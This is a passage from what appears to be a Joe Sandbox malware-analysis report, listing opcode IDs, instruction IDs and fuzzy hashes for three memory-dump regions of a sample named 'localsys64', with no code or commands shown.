                                                    • Instruction Fuzzy Hash: 8131A430B19A0D8FEB48EBA8D8696ED77A2FF99300F540579D019D32CADE38A8418751
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2463220529.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd9b880000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9f7f983d947dc1565123db80a852cebd3c3ad8094269146fb4a1491b2aaa3775
                                                    • Instruction ID: ddfd997a491ddaa56f2a9ed2a654b7cfc8432b424f71eaebb1a4d10ab944a5c0
                                                    • Opcode Fuzzy Hash: 9f7f983d947dc1565123db80a852cebd3c3ad8094269146fb4a1491b2aaa3775
                                                    • Instruction Fuzzy Hash: 5D31D930B15A4D8FD38CFB6894B98E97B72EF8620878045B5D459C33DFDE3829428761
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2463220529.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd9b880000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 94b83c4219f77eb31bbae56538be8cdc21073c2479004d2b6b4178eba6fe50f9
                                                    • Instruction ID: 8c9e50c57f0b280f2629124f9592d3fa36a1daad64bd09f21711c837d2b8ae8e
                                                    • Opcode Fuzzy Hash: 94b83c4219f77eb31bbae56538be8cdc21073c2479004d2b6b4178eba6fe50f9
                                                    • Instruction Fuzzy Hash: 87219B30B15A4D8FD38CF76894AC9E97B72EF8A204BC044A5D859D33DEDE3865018761
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2463220529.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd9b880000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7b58ceea0aaf6610f76844fe976d3f77f97c15b77ec56e4851f70b25b60a33f5
                                                    • Instruction ID: 58a153983a6636f3d46f7050d4ce9292d0ecf221469deaa53f6583b32ab86482
                                                    • Opcode Fuzzy Hash: 7b58ceea0aaf6610f76844fe976d3f77f97c15b77ec56e4851f70b25b60a33f5
                                                    • Instruction Fuzzy Hash: 77017B10A0EE890FE795737818A84717FE0CF8A300B0900BAE898C70A7DD186B418382